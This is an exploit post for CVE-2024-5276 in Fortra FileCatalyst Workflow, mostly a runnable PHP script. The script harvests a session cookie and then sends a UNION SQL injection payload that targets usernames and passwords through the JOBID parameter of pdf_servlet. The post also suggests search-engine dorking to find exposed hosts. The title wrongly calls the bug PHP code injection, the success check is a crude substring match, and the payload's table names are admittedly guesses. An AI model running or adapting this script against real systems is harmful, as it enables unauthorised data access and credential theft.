
=============================================================================================================================================
| # Title : Fortra FileCatalyst Workflow v5.1.6 Build 135 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.fortra.com/fr/lignes-de-produit/filecatalyst |
=============================================================================================================================================

POC :

[+] Dorking: locate exposed instances with Google or another search engine.

[+] Code Description: The script first requests /workflow/ to harvest a fresh JSESSIONID cookie, then replays that cookie while sending an SQL injection payload through the JOBID parameter of /workflow/pdf_servlet. Note that this is an SQL injection PoC (see the reference below), not PHP code injection as the title states; PHP is only the language the PoC is written in. Its "success" check is a naive substring match on the response and does not by itself confirm exploitation.

( Reference: https://packetstorm.news/files/id/180866/ , CVE-2024-5276 )

[+] save code as poc.php.

[+] Set Target : replace both ADD_TARGET_HERE placeholders in poc.php (lines 48 and 120 of the listing as saved).

[+] Usage : php poc.php

[+] Payload :

<?php

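class SessionExtractor {
    private $target;
    private $userAgent;
    private $jsessionid;

    /**
     * @param string $target Base URL of the FileCatalyst Workflow host; a trailing slash is stripped.
     */
    public function __construct($target) {
        $this->target = rtrim($target, '/');
        $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    }

    /**
     * GET $url and return the raw response (status line + headers + body).
     * Because CURLOPT_FOLLOWLOCATION is on and CURLOPT_HEADER is on, the
     * headers of every redirect hop are included in the returned string.
     *
     * NOTE(review): TLS verification is deliberately disabled so the PoC runs
     * against self-signed lab hosts. That exposes the request to MITM; do not
     * reuse this helper outside a controlled test environment.
     *
     * Terminates the script on a transport-level error (after releasing the
     * cURL handle, which the original leaked on that path).
     */
    private function sendRequest($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        // Bound the request so an unresponsive host cannot hang the PoC forever.
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);

        $response = curl_exec($ch);

        if (curl_errno($ch)) {
            $error = curl_error($ch);
            curl_close($ch); // release the handle before aborting
            die("cURL Error: " . $error);
        }

        curl_close($ch);
        return $response;
    }

    /**
     * Request /workflow/ and harvest the JSESSIONID the server hands out.
     *
     * The captured value is stored in $this->jsessionid, written to
     * session.txt in the working directory, echoed, and returned. The script
     * terminates if no JSESSIONID cookie is present in the response.
     *
     * @return string The session id.
     */
    public function getSessionId() {
        echo "[*] Attempt to extract JSESSIONID...\n";
        $response = $this->sendRequest("{$this->target}/workflow/");

        // The response can carry one Set-Cookie per redirect hop; a browser
        // keeps the most recently assigned value, so use the LAST match rather
        // than the first, which may belong to an earlier hop.
        if (preg_match_all('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches) && $matches[1]) {
            $this->jsessionid = trim(end($matches[1]));
            // A live session token is persisted to disk here; clean it up after use.
            if (file_put_contents("session.txt", $this->jsessionid) === false) {
                echo "[!] Warning: could not write session.txt\n";
            }
            echo "[+] Extracted JSESSIONID: {$this->jsessionid}\n";
            return $this->jsessionid;
        }

        die("[-] JSESSIONID not found. Check the link.\n");
    }
}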

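// Target base URL: the first CLI argument when one is given, otherwise the
// placeholder below (replace ADD_TARGET_HERE before running without arguments).
$target = isset($argv[1]) ? $argv[1] : 'https://ADD_TARGET_HERE/';
$extractor = new SessionExtractor($target);
$jsessionid = $extractor->getSessionId();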

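class Indoushka {
    private $target;
    private $userAgent;
    private $jsessionid = null;

    /**
     * @param string $target Base URL of the FileCatalyst Workflow host; a trailing slash is stripped.
     */
    public function __construct($target) {
        $this->target = rtrim($target, '/');
        $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    }

    /**
     * GET $url with optional extra request headers and return the raw
     * response (status line + headers + body, including the headers of every
     * redirect hop since CURLOPT_FOLLOWLOCATION and CURLOPT_HEADER are on).
     *
     * NOTE(review): TLS verification is disabled on purpose for lab hosts with
     * self-signed certificates. The session cookie is therefore sent over a
     * channel that is open to MITM; keep this to a controlled environment.
     *
     * Terminates the script on a transport-level error (after releasing the
     * cURL handle, which the original leaked on that path).
     *
     * @param string   $url
     * @param string[] $headers Raw "Name: value" header lines.
     * @return string
     */
    private function sendRequest($url, $headers = []) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => true,
            CURLOPT_FOLLOWLOCATION => true, // follow redirects
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_USERAGENT => $this->userAgent,
            CURLOPT_HTTPHEADER => $headers,
            // Bound the request so an unresponsive host cannot hang the PoC forever.
            CURLOPT_CONNECTTIMEOUT => 10,
            CURLOPT_TIMEOUT => 30,
        ]);

        $response = curl_exec($ch);
        if (curl_errno($ch)) {
            $error = curl_error($ch);
            curl_close($ch); // release the handle before aborting
            die("CURL Error: " . $error);
        }
        curl_close($ch);

        return $response;
    }

    /**
     * Harvest a JSESSIONID from /workflow/ and cache it in $this->jsessionid.
     * A second call is a no-op that reports the cached value. The script
     * terminates if no JSESSIONID cookie is present in the response.
     */
    public function getSessionId() {
        if ($this->jsessionid) {
            echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
            return;
        }

        echo "[*] Attempting to extract JSESSIONID...\n";
        $response = $this->sendRequest("{$this->target}/workflow/");

        // One Set-Cookie may appear per redirect hop; a browser keeps the most
        // recently assigned value, so take the LAST match rather than the first.
        if (preg_match_all('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches) && $matches[1]) {
            $this->jsessionid = trim(end($matches[1]));
            echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";
        } else {
            die("[-] JSESSIONID not found. Check the link.\n");
        }
    }

    /**
     * Send $payload through the JOBID query parameter of /workflow/pdf_servlet
     * while presenting the harvested session cookie.
     *
     * The outcome check is a crude heuristic: it only looks for the substrings
     * "Success" or "Admin" anywhere in the raw response (headers included). A
     * normal page containing either word yields a false positive, and a real
     * injection whose output contains neither is reported as a failure.
     * Inspect the response manually before drawing any conclusion.
     *
     * Requires getSessionId() to have run first; terminates otherwise.
     *
     * @param string $payload Raw injection string; URL-encoded before sending.
     */
    public function injectSQL($payload) {
        if (!$this->jsessionid) {
            die("[-] No session ID found. Run getSessionId() first.\n");
        }

        echo "[*] Sending SQL Injection payload...\n";

        $url = "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
        $headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
        $response = $this->sendRequest($url, $headers);

        $looksInjected = strpos($response, "Success") !== false
            || strpos($response, "Admin") !== false;
        if ($looksInjected) {
            echo "[+] SQL Injection executed successfully!\n";
        } else {
            echo "[-] SQL Injection failed. Check input validity.\n";
        }
    }
}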

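// Build the injector against the target: first CLI argument when given,
// otherwise the placeholder below (replace ADD_TARGET_HERE before running).
$target = isset($argv[1]) ? $argv[1] : 'https://ADD_TARGET_HERE/';
$injector = new Indoushka($target);
$injector->getSessionId();

// Generic UNION-based probe. The column count and the table/column names are
// illustrative only and are not derived from the FileCatalyst schema; expect
// to adjust them once the injection point is confirmed by hand.
$payload = "' UNION SELECT username, password FROM users --";

$injector->injectSQL($payload);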
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================